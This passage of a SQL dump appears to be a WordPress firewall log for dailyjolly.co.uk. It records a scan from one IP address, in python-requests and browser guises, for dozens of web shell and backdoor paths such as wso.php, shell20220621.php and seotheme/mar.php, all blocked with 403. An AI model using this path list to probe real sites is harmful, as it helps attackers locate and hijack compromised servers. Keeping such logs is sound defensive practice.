Safari\\/537.36\"}','Rxn12eKIdcmktfsqjFH4TQAp',0,1673950566.2914,279,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','wSgz6aNY7FKR5Ly2Crhq0P8A',0,1673950566.4533,234,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','gPH2rlxVQR7GZ9sDKjT8UhAz',0,1673950577.8213,256,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','V6AsQSioxY7Wkz1Bpv2mLUK0',0,1673950582.7161,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/4price.php','','{\"1\":\"python-requests\\/2.28.1\"}','4XedmIqfSK3trzNoOQ0u2AVw',0,1673950583.1256,249,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eGjlSdRCkZ3f2unJ0vBsMmXH',0,1673950589.1717,222,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','8iPB4GFczHIXL0rdnoRmMQNy',0,1673950594.1601,206,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Jzt8VZTfcKlMbAXnF7gHGSRw',0,1673950594.8615,208,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0AJg8EfSrQPI7ekmVFunYZbo',0,1673950595.7988,211,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','yFlYRcjqwLUmiM1gv2T09HfO',0,1673950596.2438,193,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jSF57DckhQusnTBXEMoAbGNr',0,1673950597.3150,180,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','MhK5G9cnk1vPJWtx3id2fB4U',0,1673950597.9214,190,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"python-requests\\/2.28.1\"}','tq6wMdYlsy0cbajLAknX8J7K',0,1673950611.5957,198,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','M4U2cAb9YCPQrS6gFvfaTxlX',0,1673950612.2134,218,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','guKyad74x8UXvOq1o5H2TChJ',0,1673950614.3358,234,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"python-requests\\/2.28.1\"}','BUrZpYMfGXbHCR9OcEdFKmzI',0,1673950614.4103,257,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/license.php','','{\"1\":\"python-requests\\/2.28.1\"}','hVwspA35lJWqNbL8ZRoIHiM7',0,1673950614.3784,289,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"python-requests\\/2.28.1\"}','a75dFgXqYwijTS1uIPbeJZBc',0,1673950614.7481,167,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','UPuMq0ZcxsaNySBWGmz3LkIj',0,1673950618.3927,195,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','crpf5uSIU4az3EHxoGwChgmN',0,1673950618.4280,196,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZdNzycHmY5XUWqVhp4fDsTxE',0,1673950619.5211,169,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','oOcDJATaiju2xKwnXhzFC5IP',0,1673950619.7557,160,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','i7tXhKBJYk5lmFnrPNwUq4xv',0,1673950624.8840,222,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.28.1\"}','LkS0YV6PWNtbHU2rmsRzodlG',0,1673950624.8605,255,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"python-requests\\/2.28.1\"}','hVdTuvZ3IRGBapqD1YWPtNEw',0,1673950624.9163,284,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','LOtICQKlmHFio6A9jkfBDnP4',0,1673950624.9171,308,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"python-requests\\/2.28.1\"}','SedI5fC9E0wAQPxLOM6FunWt',0,1673950624.9150,338,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','KcvjID30qo1luBXt6GACxWpS',0,1673950624.9799,283,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"python-requests\\/2.28.1\"}','zvLeY5X4uKVbZq3UmEPxsBow',0,1673950625.0335,250,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hE3UBJlMGcjQdRNWnskF1fub',0,1673950625.5873,212,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','satSTP1O9xiALVI4fjqJKgBG',0,1673950625.7044,229,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','8iUwfdhaZm2T1W9OnAFHIq5v',0,1673950625.7052,239,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"python-requests\\/2.28.1\"}','9rnmTNUoCcSRQejE4yMfq8w6',0,1673950625.7043,263,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','oYymA6UB5V2i0gJXeNLnarKp',0,1673950625.7210,287,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xwTQuPgO0X3bpVNWMsRnvCm9',0,1673950625.7379,272,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','wajMPU2rBVDHANhlZkeO7SYp',0,1673950625.7359,275,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','WgA7Zrb5dNnQJzPIHORsK90V',0,1673950626.1642,179,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YuW0G3F9kAnDTQozhEeHfbw2',0,1673950626.1941,191,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2N1fDSWCzZdcq4pB6xLeFklu',0,1673950627.8401,234,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','gz8ZtVi5fInvTqb73K2UDAy9',0,1673950627.9771,167,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','nuvWKAibtYm9UTpjwkLSBR4o',0,1673950790.7723,287,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','IieWT1zAd53KHoyqaOvNFRjZ',0,1673950790.7980,261,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','kVXzuGTtWy0HMxLJQv9NAnmb',0,1673950790.7725,289,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.28.1\"}','0dqZT9XlyUNLcDVsg1RHjK54',0,1673950790.8766,205,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','PRN1HJ5KwkyM4If3uOYBbvAq',0,1673950790.9035,204,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/style.php','','{\"1\":\"python-requests\\/2.28.1\"}','qBd8jG3vYSQJcCxOUuITk12V',0,1673950790.9613,205,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','hLKJQ1glZjPdqDEyCoI75RHx',0,1673950791.1180,179,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','Nyu69eFq0tbPSZ7KhdAlvIgU',0,1673950791.1621,166,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','CP3lRBDkNQXzfg9cIyuh6ZJY',0,1673950791.1595,168,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','LJKemF8WVan213r7QCbIxOoq',0,1673950791.3633,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.28.1\"}','UPEcWszTgSt2OmCukZFRfprh',0,1673950791.3664,209,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/error.php?phpshells','','{\"1\":\"python-requests\\/2.28.1\"}','3dlHYEn2pkKW6zfuPixrSNb9',0,1673950791.4884,174,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/lufix.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4uGB5CsLyHpoa0MzqJg3Kicr',0,1673950791.4849,198,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','Ufru8bVGtWpa79RBqI3lwxyF',0,1673950791.7412,203,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/css/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','SRq12UObgaHjpx9mTovEi8fd',0,1673950791.7829,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.28.1\"}','7EOGl6XyeizUVFtq1Jo8sKfR',0,1673950791.7834,202,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','BLRye47i2IwgYarhJ0oAKE9c',0,1673950791.8068,198,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','BHhuGbyCI1UxOEAf9wXnRzDY',0,1673950791.8855,190,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/xm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','oiu6y1OHpnStdDCF0wX3RKUm',0,1673950792.0876,170,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8MKtsc50eo2uZgWdnB7aLjyI',0,1673950792.2241,185,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','VGtB0XQSMTY86fvZhCHdx5w3',0,1673950792.2795,168,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','OFsX7AjVBwhNUnCcD1QYuorE',0,1673950793.0596,190,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7lsJDuRAX6TrndMUYa1et3op',0,1673950794.0805,195,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','LMweR1fD9kYxiBE6JIUoyHSN',0,1673950794.5126,166,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','O5m3Y2DTjSeukXot8fdlUKBH',0,1673950794.6069,171,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','aLEm6AqBY7WI9goJKeR4uNpx',0,1673950794.6496,169,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','z4NpbtOi9KM0TYluJCsqBy2f',0,1673950794.6752,172,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.1\"}','WsKdgknu5F1TOZSo6yMzjG2v',0,1673950795.2599,165,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/shell20220621.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','a4ZrSlmkYtjxzHNRi3TCd0b7',0,1673950795.2600,176,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7E0aFMR8qSjHDXzfkbdgmpLU',0,1673950795.2480,188,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QFDSMULXilfP8Wa6uTVs7yo3',0,1673950795.4437,180,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EekUxDB0rpg21F4bfNOGRt8y',0,1673950795.4429,214,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"python-requests\\/2.28.1\"}','LKReWYGpICEh5O8bydTXHkja',0,1673950795.5186,190,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/error.php?phpshells','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','9AutmRyVT2Gbhc5IwZpn4ga8',0,1673950796.5192,181,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mt/pekok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zZwL2Ulp53DTYXnJe91mPN4k',0,1673950796.5839,167,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LYyhfUgo8bv5rsJ3HIktZj1x',0,1673950796.6423,168,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','npdh7aEg5kxSX493fFNG0Hjc',0,1673950796.8071,164,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','yOfGgIZNmot8unMVC09xK7RF',0,1673950796.9807,177,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Qy8gs7xJ5qKj2TVlPHkaMvYN',0,1673950797.1068,167,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/css/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','navKDMkcHPsdB37i16yxVFoz',0,1673950797.4953,160,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Q6XZnGAk1gIq47xtoFSR82Js',0,1673950797.7511,165,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','m7JG4Tg5SfMnFotQ8V6PDuL2',0,1673950797.8840,174,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.1\"}','l3wZfR7gn8vWuyidcF4CUJBP',0,1673950807.5082,200,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','S2J3L1Gcxn6yuz4vBd0T57pV',0,1673950807.5646,209,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"python-requests\\/2.28.1\"}','8WqV6YlATRiJB4tcmCS2DQpu',0,1673950807.5196,260,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5uP4vm0gXAMDH9jTe8yGtLx2',0,1673950808.2665,209,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LopYstWu28Ur6XOjNA0IzBGJ',0,1673950808.2953,223,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/indeeex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','j3zc8nZBbIp2URGdEqLC6vo7',0,1673950808.3374,199,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/e.php','','{\"1\":\"python-requests\\/2.28.1\"}','mA3US8jWw6oPcFOIkXnfV2E1',0,1673950816.9189,231,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','a9mNTA6dcbIJ1X2E8ZlYsPnO',0,1673950816.9282,221,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','RIOE9Mxt2JWB68wiQnupoCDl',0,1673950816.9245,227,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','XfIzL6ubmx4K9CqD1FEwPkVO',0,1673950817.0731,245,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LvXe9uKQJkw45BUMbt8cD3sa',0,1673950817.4421,212,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','lS0GJP9zesLEZAgbBuIwOX6F',0,1673950817.4732,249,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','By1Tpg6FILDHusdNvqOQ2aVA',0,1673950817.5483,252,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2lYPRyhQ3ZciXrog857UufVt',0,1673950817.5580,242,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','IHYsou68Qnt7xwc0eTmvAqP2',0,1673950819.8284,283,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tpiae4vdwOVI3nLlBrR8UsJS',0,1673950820.4642,215,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','2DAfPyRcU7tgq1FK9kLTpjQi',0,1673950828.9609,196,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 